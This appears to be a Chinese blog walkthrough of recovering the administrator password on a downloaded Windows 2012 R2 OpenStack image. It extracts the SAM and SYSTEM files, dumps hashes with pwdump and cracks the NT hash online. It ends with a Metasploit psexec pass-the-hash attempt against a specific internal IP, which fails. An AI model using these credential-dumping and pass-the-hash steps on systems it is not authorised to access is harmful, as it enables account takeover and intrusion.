Windows 2012R2 密码破解案例

一、背景:

网上下载的  openstack Windows2012R2.qcow2镜像,安装后不知道密码,无法登录。

二、通过sam文件破解

思路一:通过载入winpe光盘镜像,使用NTPWEdit 0.5 导入config\sam文件,对administrator密码进行修改。

优点:当前系统可以使用新密码登录。
缺点:永远不知道原始密码,新安装的系统每次都要破解。

思路二:想办法读取到密码,一劳永逸。

1、将qcow2镜像转换成vmdk,然后在vmware下挂载,映射,读取sam文件。
本来打算直接从qcow2镜像中读取,但是找了半天,也没有趁手的工具,只能换个思路。
2、安装软件,对镜像进行转换。

yum install qemu-img –y
qemu-img convert -f qcow2 c39b11cc-9df6-48e8-820b-0cd978723fa3_v1.qcow2 windows2012.vmdk

结果: vmware无法识别转换后的格式,无法挂载。

换个方法~

1、用winimage.exe打开vmdk文件,将sam文件导出(同时也将system文件导出,备用)
2、使用SAMInside.exe工具,发现无法破解。

再换思路~

1、使用kali系统自带的pwdump工具进行读取sam hash值。
将上面导出的system和sam文件上传到kali的目录,使用pwdump工具。

命令:

pwdump SYSTEM SAM
顺利读出hash值,前半截是LMHASH,后半截是NTHASH。
2、到cmd5平台进行破解,lmhash破解为空,其实是错误的,尝试破解nthash,密码破解成功!
3、顺利登录系统。

三、HASH传递利用

使用Hash直接登录Windows
抓取windows hash值
得到administrator的hash:
aad3b435b51404eeaad3b435b51404ee:579110c49145015c47ecd267657
msf调用payload:
use exploit/windows/smb/psexec
show options
set RHOST 172.16.20.239
set SMBPass aad3b435b51404eeaad3b435b51404ee:579110c49145015c47ecd267657
set SMBUser Administrator
show options
run
失败! 毕竟 445端口都不通~